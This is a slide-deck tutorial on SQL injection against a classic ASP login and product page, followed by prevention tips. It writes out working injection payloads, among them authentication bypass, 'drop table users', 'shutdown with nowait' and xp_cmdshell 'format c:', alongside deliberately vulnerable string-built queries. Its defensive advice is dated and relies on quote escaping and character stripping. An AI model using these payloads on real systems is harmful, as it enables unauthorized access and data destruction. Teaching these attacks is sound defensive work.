Download - Sql Injection Attacks Siddhesh
SQL Injection Attacks
Siddhesh Bhobe
Copyright Persistent Systems Pvt. Ltd.
http://www.eusersolutions.com
SQL Injection Attack…
…"injects" or manipulates SQL code using “string-building” techniques.
By adding unexpected SQL to a query, it is possible to manipulate a database in many unanticipated ways.
Attacks are successful due to poor input validation at code layer
Copyright Persistent Systems Pvt. Ltd.
http://www.eusersolutions.com
Example 1: HTML Form
Consider the following HTML form for Login:
<form name="frmLogin" action="login.asp" method="post"> Username: <input type="text" name="userName"> Password: <input type="text" name="password"> <input type="submit">
</form>
Copyright Persistent Systems Pvt. Ltd.
http://www.eusersolutions.com
Example 1: ASP Script
<%
…
userName = Request.Form("userName“
password = Request.Form("password")
query = "select count(*) from users where userName='" & userName & "' and userPass='" & password & "'“
…
%>
Copyright Persistent Systems Pvt. Ltd.
http://www.eusersolutions.com
Sample Input
Login =john, Password = doe
select count(*) from users where userName='john' and userPass='doe'
Copyright Persistent Systems Pvt. Ltd.
http://www.eusersolutions.com
Now check this!
Login = john, Password = ' or 1=1 --
select count(*) from users where userName='john' and userPass='' or 1=1 --'
Password check is nullified
-- used to prevent ASP from reporting mismatched quotes
Copyright Persistent Systems Pvt. Ltd.
http://www.eusersolutions.com
And what about this?
Username: ' or 1=1 -- and Password: [Empty]
select count(*) from users where userName='' or 1=1 --' and userPass=''
Copyright Persistent Systems Pvt. Ltd.
http://www.eusersolutions.com
Example 2
Username: ' having 1=1 -- , Password: [Empty]
select userName from users where userName='' having 1=1
Copyright Persistent Systems Pvt. Ltd.
http://www.eusersolutions.com
You get a column name…
You will get the following error message:
Microsoft OLE DB Provider for SQL Server (0x80040E14) Column 'users.userName' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
/login.asp, line 16
Copyright Persistent Systems Pvt. Ltd.
http://www.eusersolutions.com
The Attack…
Username: ' or users.userName like 'a%' --
select userName from users where userName='' or users.userName like 'a%' --' and userPass=''
Logged In As admin!!!
Copyright Persistent Systems Pvt. Ltd.
http://www.eusersolutions.com
Use of Semi-colon
Semi-colon allows multiple queries to be specified on one line.
Submitted as one batch and executed sequentially
select 1; select 1+2; select 1+3;
Copyright Persistent Systems Pvt. Ltd.
http://www.eusersolutions.com
Can you guess what happens?
Username: ' or 1=1; drop table users; --
Copyright Persistent Systems Pvt. Ltd.
http://www.eusersolutions.com
Table dropped!
Username: ' or 1=1; drop table users; -- and Password: [Anything]
Firstly, it would select the userName field for all rows in the users table.
Secondly, it would delete the users table
Copyright Persistent Systems Pvt. Ltd.
http://www.eusersolutions.com
SHUTDOWN WITH NOWAIT!!
…causes SQL Server to shutdown, immediately stopping the Windows service
Username: '; shutdown with nowait; --
select userName from users where userName=''; shutdown with nowait; --' and userPass=''
Copyright Persistent Systems Pvt. Ltd.
http://www.eusersolutions.com
Products.asp
http://localhost/products.asp?productId=1 returns Got product Pink Hoola Hoop
But what about this?
http://localhost/products.asp?productId=0;insert%20into%20products(prodName)%20values(left(@@version,50))
Copyright Persistent Systems Pvt. Ltd.
http://www.eusersolutions.com
Wham!
Here's the query without the URL-encoded spaces:
http://localhost/products.asp?productId=0;insert into products(prodName) values(left(@@version,50))
Runs an INSERT query on the products table, adding the first 50 characters of SQL server's @@version variable as a new record in the products table.
Copyright Persistent Systems Pvt. Ltd.
http://www.eusersolutions.com
Effects
Privilege Level: sa
Total control of SQL Server
OS Shell at privilege of MSSQLServer service using xp_cmdshell
Ability to read, write, mutilate all data
Copyright Persistent Systems Pvt. Ltd.
http://www.eusersolutions.com
Effects
Privilege Level: db_owner
Read/write all data in affected database
Drop tables
Create new objects
Take control of the database
Copyright Persistent Systems Pvt. Ltd.
http://www.eusersolutions.com
Effects
Privilege Level: normal user (no fixed server or database roles)
Access objects to which permission is given
At best, only some few stored procedures
At worst, read/write access to all tables
Recommended!
Copyright Persistent Systems Pvt. Ltd.
http://www.eusersolutions.com
Testing for Vulnerability
Disable error handling so that errors are displayed
Input single quotes to see if the application fails
Failure indicates poor validation and corruption of SQL
Copyright Persistent Systems Pvt. Ltd.
http://www.eusersolutions.com
Preventing SQL Injection Attacks
Limit User Access
Escape Quotes
Remove culprit characters
Limit length of user input
Copyright Persistent Systems Pvt. Ltd.
http://www.eusersolutions.com
Limit User Access
Do not use “sa” account
Removed extended SPs if you are not using them. The following are couple of the most damaging ones:
xp_cmdshell
xp_grantlogin
Use SPs to abstract data access
Copyright Persistent Systems Pvt. Ltd.
http://www.eusersolutions.com
Escape Quotes
Convert single quotes to double quotes<% function stripQuotes(strWords)
stripQuotes = replace(strWords, "'", "''") end function
%>
Converts
select count(*) from users where userName='john' and userPass='' or 1=1 --'
...to this:select count(*) from users where userName='john'' and
userPass=''' or 1=1 --'
Copyright Persistent Systems Pvt. Ltd.
http://www.eusersolutions.com
Drop culprit characters
Drop character sequences like ;, --, insert and xp_
select prodName from products where id=1; xp_cmdshell 'format c: /q /yes '; drop database myDB; --
becomesselect prodName from products where
id=1 cmdshell ''format c: /q /yes '' database myDB
Copyright Persistent Systems Pvt. Ltd.
http://www.eusersolutions.com
Restrict length of user input
Limit length in the form field
Use validating functions for numeric input
Use POST, not GET
Copyright Persistent Systems Pvt. Ltd.
http://www.eusersolutions.com
Thanks!
Original Article:
http://www.webmasterbase.com/article.php?aid=794&pid=0
Also on Reismagos…